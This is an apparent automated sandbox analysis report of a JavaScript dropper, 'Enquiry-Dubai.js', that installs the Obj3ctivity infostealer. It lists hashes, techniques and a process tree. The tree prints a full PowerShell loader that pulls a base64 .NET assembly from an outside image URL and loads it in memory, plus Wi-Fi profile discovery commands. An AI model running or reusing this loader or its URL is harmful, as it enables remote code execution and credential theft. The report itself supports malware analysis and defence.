Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29/01/2025, 18:55
Static task
static1
Behavioral task
behavioral1
Sample
Enquiry-Dubai.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Enquiry-Dubai.js
Resource
win10v2004-20241007-en
General
-
Target
Enquiry-Dubai.js
-
Size
175KB
-
MD5
bfacd543f1c8ed0bbbb56d4ee2163b27
-
SHA1
f752d970c3e8c41c9c1bc42443c378d3353c3511
-
SHA256
0b44b661974b43ec8eac1f352951cb1f9fc703bbbbbd0e57a38e118b5d1524ec
-
SHA512
c23f6307a4754d9138d839af693d2ff02c5c49fa6cb38d7deaaf636b79d2986beb059c805a6ffae7ccc948fcf5225368c4773cbb02ea63aa347c9842418dbfa8
-
SSDEEP
3072:IzkhJXA9AyzShrbV8QauBNA96q0rvY4FDKj:IIPrbV8JKkj
Malware Config
Extracted
https://res.cloudinary.com/daxwua63y/image/upload/v1737696171/heke2pmteuw8sqsplhkl.jpg
https://res.cloudinary.com/daxwua63y/image/upload/v1737696171/heke2pmteuw8sqsplhkl.jpg
Signatures
-
Detects Obj3ctivity Stage1 1 IoCs
Obj3ctivity aka PXRECVOWEIWOEI is an infostealer written in C#.
resource yara_rule behavioral2/memory/4788-21-0x0000000000400000-0x00000000004E6000-memory.dmp family_obj3ctivity -
Obj3ctivity family
-
Obj3ctivity, PXRECVOWEIWOEI
Obj3ctivity aka PXRECVOWEIWOEI is an infostealer written in C#.
-
Blocklisted process makes network request 5 IoCs
flow pid Process 4 1200 wscript.exe 7 1200 wscript.exe 9 1200 wscript.exe 14 2348 powershell.exe 16 2348 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
pid Process 2348 powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 icanhazip.com 42 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2348 set thread context of 4788 2348 powershell.exe 86 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3672 cmd.exe 5112 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2348 powershell.exe 2348 powershell.exe 4788 MSBuild.exe 4788 MSBuild.exe 4788 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 4788 MSBuild.exe Token: SeSecurityPrivilege 1888 msiexec.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1200 wrote to memory of 2348 1200 wscript.exe 84 PID 1200 wrote to memory of 2348 1200 wscript.exe 84 PID 2348 wrote to memory of 4788 2348 powershell.exe 86 PID 2348 wrote to memory of 4788 2348 powershell.exe 86 PID 2348 wrote to memory of 4788 2348 powershell.exe 86 PID 2348 wrote to memory of 4788 2348 powershell.exe 86 PID 2348 wrote to memory of 4788 2348 powershell.exe 86 PID 2348 wrote to memory of 4788 2348 powershell.exe 86 PID 2348 wrote to memory of 4788 2348 powershell.exe 86 PID 2348 wrote to memory of 4788 2348 powershell.exe 86 PID 4788 wrote to memory of 3672 4788 MSBuild.exe 88 PID 4788 wrote to memory of 3672 4788 MSBuild.exe 88 PID 4788 wrote to memory of 3672 4788 MSBuild.exe 88 PID 3672 wrote to memory of 1424 3672 cmd.exe 91 PID 3672 wrote to memory of 1424 3672 cmd.exe 91 PID 3672 wrote to memory of 1424 3672 cmd.exe 91 PID 3672 wrote to memory of 5112 3672 cmd.exe 92 PID 3672 wrote to memory of 5112 3672 cmd.exe 92 PID 3672 wrote to memory of 5112 3672 cmd.exe 92 PID 3672 wrote to memory of 1916 3672 cmd.exe 93 PID 3672 wrote to memory of 1916 3672 cmd.exe 93 PID 3672 wrote to memory of 1916 3672 cmd.exe 93 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Enquiry-Dubai.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$originalText = '#x#.621/elif/#en.salij//:sp##h';$restoredText = $originalText -replace '#', 't';$imageUrl = 'https://res.cloudinary.com/daxwua63y/image/upload/v1737696171/heke2pmteuw8sqsplhkl.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = [ClassLibrary1.Home].GetMethod('main').Invoke($null, [object[]] @($restoredText,'false','MSBuild','false'))"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4788 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:1424
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5112
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵
- System Location Discovery: System Language Discovery
PID:1916
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82